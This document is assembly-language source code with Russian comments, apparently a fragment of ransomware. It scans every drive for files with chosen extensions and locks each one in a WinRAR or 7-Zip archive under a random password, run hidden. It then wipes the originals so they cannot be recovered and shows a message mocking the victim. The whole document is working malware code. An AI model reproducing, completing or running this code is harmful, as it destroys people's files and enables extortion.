; Выделяем память для вайпинга файлов. Так называется стирание файлов без возможности восстановления.
; Просто удалить файл - способ для криворуких, т.к. различные Лепрозории Касперского публикуют
; зиродей-методы для восстановления файлов.
invoke GlobalAlloc, GPTR, BUFFER_SIZE
.if (eax==0)
jmp ohshit
.endif
mov hmem, eax
; Вызываем процедуру поиска и обработки файлов.
call FileSearch
; Освобождаем память, выделенную под буфер для вайпинга.
invoke GlobalFree, hmem
; Показываем пользователю сообщение о том, что он криворукий дебил - взял и запустил левый ЕХЕ.
invoke MessageBox, 0, addr UserMessage, 0, 0
ohshit:
invoke ExitProcess, 0
; Процедура получения пути к архиватору. В ней нет ничего сложного, no comments.
GetPackerPath proc p1:DWORD, p2:DWORD, p3:DWORD, p4:DWORD
LOCAL ValLen :DWORD
LOCAL lpdwDisp :DWORD
LOCAL hKey :DWORD
invoke RegCreateKeyEx, HKEY_CLASSES_ROOT, p1, 0, 0, 0, KEY_READ, 0, addr hKey, addr lpdwDisp
test eax, eax
je @F
xor eax, eax
ret
@@:
mov dword ptr [ValLen], BufLen
invoke RegQueryValueEx, hKey, p2, 0, 0, addr PackerPath, addr ValLen
test eax, eax
je @F
xor eax, eax
ret
@@:
invoke RegCloseKey, hKey
; Путь в реестре хранится в таком виде: "C:\Program Files\WinRAR\WinRAR.exe" "%1".
; Поэтому его нужно пропарсить.
invoke lstrlen, addr PackerPath
dec eax
mov ecx, eax
mov esi, offset PackerPath
inc esi
mov ebx, esi
mov dword ptr [PackerPathPointer], ebx
@@:
lodsb
cmp al, '"'
je @F
loop @B
@@:
mov byte ptr [esi-1], 0
invoke PathFindFileName, ebx
mov byte ptr [eax], 0
invoke lstrcat, ebx, p3
; В переменную TypeOfPacker записывается значение - идентификатор используемого архиватора, четвертый параметр - p4
; Т.е если путь к винрару был удачно получен, пишем туда WINRAR_PACK, если к 7-Zip'y - SEVENZIP_PACK.
mov eax, dword ptr [p4]
mov byte ptr [TypeOfPacker], al
mov eax, 1
ret
GetPackerPath endp
; Процедура пакования файлов.
PackFile proc
; Генерируем для архива пароль.
call PwdGen
invoke lstrcpy, addr ArName, addr FilePathBuf
invoke PathFindExtension, addr ArName
invoke lstrcat, addr ArName, addr VirSign
mov al, byte ptr [TypeOfPacker]
cmp al, WINRAR_PACK
jne @F
invoke lstrcat, addr ArName, addr WinrarExt
invoke wsprintf, addr TmpBuf, addr WinrarMask, addr GeneratedPassword, addr ArName, addr FilePathBuf
jmp done_2
@@:
invoke lstrcat, addr ArName, addr SevenZipExt
invoke wsprintf, addr TmpBuf, addr SevenZipMask, addr GeneratedPassword, addr ArName, addr FilePathBuf
done_2:
invoke RtlZeroMemory, addr sei, sizeof sei
; Заполняем структуру SHELLEXECUTEINFO и запускаем rar.exe с парамтером командной строки,
; в котором хранится путь к файлу для шифрования, путь к выходящему файлу и параметры упаковки.
mov sei.cbSize, sizeof sei
mov sei.fMask, SEE_MASK_NOCLOSEPROCESS
mov sei.nShow, SW_HIDE
mov eax, dword ptr [PackerPathPointer]
mov sei.lpFile, eax
mov sei.lpParameters, offset TmpBuf
invoke ShellExecuteEx, addr sei
test eax, eax
jne run_good
; Если запуск апроцеса архивации неудался, выходим.
ret
run_good:
; Ждем завершения паковки.
invoke WaitForSingleObject, sei.hProcess, INFINITE
invoke CloseHandle, sei.hProcess
; Стираем файл без возможности воссановления.
call WipeFile
ret
PackFile endp
; Рекурсивная процедура поиска файлов, автор - Ct757.
find_files proc
push ebp
mov ebp,esp
sub esp,144h
lea eax,[ebp-144h]
invoke FindFirstFile,offset SearchBuf,eax
inc eax
je exit
dec eax
mov dword ptr [ebp-6h],eax
find_next:
mov eax,dword ptr [ebp-144h]
and eax,FILE_ATTRIBUTE_DIRECTORY
je found
lea eax,[ebp-118h]
invoke lstrcmp,offset fake1,eax
test eax,eax
je next
lea eax,[ebp-118h]
invoke lstrcmp,offset fake2,eax
test eax,eax
je next
invoke lstrlen,offset SearchBuf
sub eax,3
push eax
mov byte ptr [SearchBuf+eax],0
lea eax,[ebp-118h]
invoke lstrcat,offset SearchBuf,eax
invoke lstrlen,offset SearchBuf
mov dword ptr [SearchBuf+eax],'*.*\'
mov byte ptr [SearchBuf+eax+4],0
call find_files
pop eax
mov dword ptr [SearchBuf+eax-1],'*.*\'
mov byte ptr [SearchBuf+eax+3],0
jmp next
found:
lea ebx,[ebp-118h]
; Проверяем, подходит ли найденный файл нам - сверяем с расширениями.
mov ecx, dword ptr [EXTENSION_COUNT]
mov esi, offset lbl1
@@:
push ecx
invoke PathMatchSpec, ebx, esi
test eax, eax
jne @F
invoke lstrlen, esi
add esi, eax
inc esi
pop ecx
loop @B
; Если нет - ищем следующий.
jmp next
@@:
; Создаем полный путь к найденому файлу.
invoke lstrcpy, addr FilePathBuf, addr SearchBuf
invoke PathFindFileName, addr FilePathBuf
mov byte ptr [eax], 0
lea eax,[ebp-118h]
invoke lstrcat, addr FilePathBuf, eax
; Вызываем процедуру паковки файлов.
call PackFile
next:
lea eax,[ebp-144h]
invoke FindNextFile,dword ptr [ebp-6h],eax
test eax,eax
jne find_next
invoke FindClose,dword ptr [ebp-6h]
exit:
leave
ret
find_files endp
; Процедура, вызывающая поиск файлов по дискам. Т.е. она перечисляет доступные диски
; и вызывает для каждого из них find_files.
FileSearch proc
invoke SetErrorMode,SEM_FAILCRITICALERRORS
invoke GetLogicalDrives
mov ecx,25
find_drives:
mov ebx,1
shl ebx,cl
and ebx,eax
je no_disk
add cl,65
mov byte ptr SearchBuf,cl
sub cl,65
mov dword ptr SearchBuf+1,'.*\:'
mov byte ptr SearchBuf+5,'*'
mov byte ptr SearchBuf+6,0
push eax
push ecx
call find_files
pop ecx
pop eax
no_disk:
dec ecx
jge find_drives
ret
FileSearch endp
; Тут происходит генерация пароля для архива.
; Для получения случайных чисел в нужном диапазоне, вызываем GetRandom.
PwdGen proc
lea edi, GeneratedPassword
mov ecx, 64
@@:
call GetRandom
stosb
loop @B
ret
PwdGen endp
; Получаем случайное число в диапазоне [ 41h..5Ah ].
GetRandom proc
push edx
push ecx
mov ecx,5Ah
sub ecx,41h
inc ecx
push edx
push ecx
db 0Fh, 31h
xor eax,edx
xor edx,edx
mov ecx,127773
div ecx
mov ecx,eax
mov eax,16807
mul edx
mov edx,ecx
mov ecx,eax
mov eax,2836
mul edx
sub ecx,eax
xor edx,edx
mov eax,ecx
mov ecx,100000
div ecx
mov eax,edx
pop ecx
pop edx
xor edx,edx
div ecx
mov eax,edx
add eax,41h
pop ecx
pop edx
ret
GetRandom endp
; Процедура вайпинга файлов.
; Для этого сначала файл перезаписывается нулями, затем укорачивается до нулевой длины и удаляется.
; Как показали эксперименты, после такого, программы восстановления файлов нервно курят в сторонке.
WipeFile proc
LOCAL h :DWORD
LOCAL nw :DWORD
LOCAL dmod :DWORD
LOCAL towrite :DWORD
invoke CreateFile, addr FilePathBuf, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL
cmp eax, -1
jne @F
ret
@@:
mov h, eax
invoke SetFilePointer, h, 0, NULL, FILE_BEGIN
invoke GetFileSize, h, NULL
cmp eax, BUFFER_SIZE
jge @F
mov ecx, 1
mov dword ptr [towrite], eax
mov dword ptr [dmod], 0
jmp loop_wipe
@@:
xor edx, edx
mov ebx, BUFFER_SIZE
div ebx
mov ecx, eax
mov dword ptr [towrite], BUFFER_SIZE
mov dword ptr [dmod], edx
loop_wipe:
push ecx
invoke WriteFile, h, [hmem], [towrite], addr nw, NULL
pop ecx
loop loop_wipe
mov eax, dword ptr [dmod]
test eax, eax
je bez_ostatka
invoke WriteFile, h, [hmem], [dmod], addr nw, NULL
bez_ostatka:
invoke SetFilePointer, h, 0, NULL, FILE_BEGIN
invoke SetEndOfFile, h
invoke CloseHandle, h
invoke DeleteFile, addr FilePathBuf
ret
WipeFile endp
end start